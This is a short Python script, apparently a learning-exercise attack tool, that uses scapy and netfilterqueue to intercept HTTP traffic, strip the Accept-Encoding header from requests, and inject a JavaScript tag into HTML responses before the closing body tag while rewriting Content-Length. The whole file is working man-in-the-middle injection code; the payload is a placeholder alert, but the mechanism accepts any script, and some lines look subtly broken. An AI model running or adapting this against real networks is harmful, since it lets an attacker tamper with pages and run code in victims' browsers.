#!/usr/bin/python3.8

import scapy.all as scapy
import netfilterqueue
import re

def set_load(packet,load):
	packet[scapy.Raw].load = load
	del packet[scapy.IP].len
	del packet[scapy.IP].chksum
	del packet[scapy.TCP].chksum
	return packet

def process_packet(packet):
	scapy_packet = scapy.IP(packet.get_payload())
	if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
		load = scapy_packet[scapy.Raw].load
		if scapy_packet[scapy.TCP].dport == 80:
			print('[+] Request')
			load = re.sub('Accept Encoding:.*?\\r\\n','',str(load))
			
		elif scapy_packet[scapy.TCP].sport == 80:
			print('[+] Response')
			print(scapy_packet.show())

			injected_code = '<script>alert("yo");</script>'
			load = scapy_packet[scapy.Raw].load.replace('</body>',injected_code+'</body>')
			match = re.findall("Content-Length:\s(\d*)",str(load))[0]
			if match and 'text/html' in str(load):
				load = str(load).replace(match,str(int(match)+len(injected_code)))

		if load != scapy_packet[scapy.Raw].load:
			new_packet = set_load(scapy_packet,load)
			packet.set_payload(bytes(new_packet))

	packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()